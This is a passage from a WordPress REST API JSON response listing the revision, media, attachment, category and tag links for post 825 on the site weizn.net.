v2\/posts\/825\/revisions"}],"predecessor-version":[{"id":861,"href":"http:\/\/weizn.net\/index.php?rest_route=\/wp\/v2\/posts\/825\/revisions\/861"}],"wp:featuredmedia":[{"embeddable":true,"href":"http:\/\/weizn.net\/index.php?rest_route=\/wp\/v2\/media\/827"}],"wp:attachment":[{"href":"http:\/\/weizn.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=825"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/weizn.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=825"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/weizn.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=825"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}